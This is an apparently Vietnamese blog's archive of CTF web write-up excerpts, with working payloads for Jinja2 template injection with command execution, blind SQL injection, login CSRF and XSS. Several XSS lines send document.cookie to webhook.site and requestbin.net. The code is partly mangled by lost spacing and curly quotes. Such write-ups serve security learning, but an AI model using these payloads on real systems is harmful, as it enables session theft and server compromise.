Category Archives: CTF

1. Jsonify 12345678910111213141516171819202122232425 classFlag{    public$isAllowedToSeeFlag;    public$flagfile;    public$properties= array(“isAllowedToSeeFlag”,”flagfile”);    publicfunction__shutdown(){        return$this->properties;    }}$obj= newFlag();$obj->isAllowedToSeeFlag = true;$obj->flagfile = “./flag.php”;//hàm này có sẵn trong source codefunctionsecure_jsonify($obj){    $data= array();    $data[‘class’] = get_class($obj);    $data[‘properties’] = array();    foreach($obj->__shutdown() as& $key){        $data[‘properties’][$key] = serialize($obj->$key);    }    returnjson_encode($data);}echosecure_jsonify($obj); 2. Unis Love Code 3. Repass 123456789101112131415161718192021222324252627 importhashlibimportrandomfromdatetime importdatetimeimporttime# timestamp = int(time.time())# print(timestamp)timestamp =1660578999dt_object =datetime.fromtimestamp(timestamp)print(“time:”, dt_object)username =”ctf”rng_init =f”{username}:{timestamp // 10}”rng =random.Random(int.from_bytes(rng_init.encode(), byteorder=’little’))p_o_w =”pow:”+”.join([b forb inchr(rng.randint(97, 122)) fori inrange(rng.randint(10, 15))])print(p_o_w)key =1forsecretContinue reading “[Write-Up] NullCon CTF 2022 – Web”

1. Amy The Hedgehog 2. Secure Website 3. Emoji 1234567891011121314151617181920 #!pythonimportrequestsbase=”””{{request|attr(‘application’)|attr(‘\x5f\x5fglobals\x5f\x5f’)|attr(‘\x5f\x5fgetitem\x5f\x5f’)(‘\x5f\x5fbuiltins\x5f\x5f’)|attr(‘\x5f\x5fgetitem\x5f\x5f’)(‘\x5f\x5fimport\x5f\x5f’)(‘os’)|attr(‘popen’)(“python3 -c ” + “\\”exec(‘{i}’)\\””)|attr(‘read’)()}}”””flag=””j=1whileTrue:    fori inrange(32,127):        inject=”””import requests;  r = requests.post(r\\”http://172.24.0.8:8080/runquery\\”, json={{\\”username\\”: \\”flag\\’ and substr(password,{j},1)=char({i});–\\”,\\”password\\”: \\”\\”}});print(r.text)”””.format(j=j,i=i)        c=”.join([hex(ord(inject[i])).replace(‘0x’,’\\x’) fori inrange(len(inject))])        payload={            ‘username’:’a’,            ‘password’:”{“+base.format(i=c)+”}”        }        r=requests.post(‘http://litctf.live:31781/’,data=payload,headers={“Content-Type”: “application/x-www-form-urlencoded”})        if”True”inr.text:            flag+=chr(i)            j+=1            print(flag)            break Tham khảo:

Tham khảo:

link: https://play.picoctf.org/events/70/challenges?category=1&page=1 1. Includes 2. Inspect HTML 3. Local Authority 4. Search source 5. Forbidden Paths 6. Power Cookie 7. Roboto Sans 8. Secrets 9. SQL Direct 10. SQLiLite 11. noted 123456789 data:text/html,<form action=”http://localhost:8080/login”method=POST id=pwn target=_blank>  <input type=”text”name=”username”value=”a”><input type=”text”name=”password”value=”a”></form><script>  window.open(‘http://localhost:8080/notes&#8217;, ‘pwn’);  setTimeout(`pwn.submit()`, 1000);  setTimeout(`window.location=’http://localhost:8080/notes?pwn&#8217;`, 1500);</script> Tham khảo:

1. XSS – Reflected 1 <script>alert(1)</script> 1 test” onmousemove=”alert(1) 1 test’ onmousemove=’alert(1) 1 test’ onmousemove=’document.location=”https://webhook.site/65a8b027-b90a-4aab-9e17-1ef2a69d67a2?cmd=&#8221;.concat(document.cookie) 2. XSS – Stored 1 1 <imgsrc=1onerror=’document.location=”https://webhook.site/65a8b027-b90a-4aab-9e17-1ef2a69d67a2?cmd=”+document.cookie’/&gt; 3. XSS DOM Based – Introduction 1 test’; alert(1);// 1 test’; document.location=”https://webhook.site/65a8b027-b90a-4aab-9e17-1ef2a69d67a2?cmd=&#8221;.concat(document.cookie);// 1 http://challenge01.root-me.org/web-client/ch32/index.php?number=test%27;%20document.location=%22http://requestbin.net/r/crkucapp?cmd=%22.concat(document.cookie);// 4. XSS DOM based-AngularJS 1 test’; alert(1);// 1 {{constructor.constructor(“alert(1)”)()}} (đoạn mã này sử dụng hàm khởi tạo trong angularContinue reading “[Write-Up] – Rootme [XSS challenge]”

I. Webhacking.kr II. Root-me Tham khảo: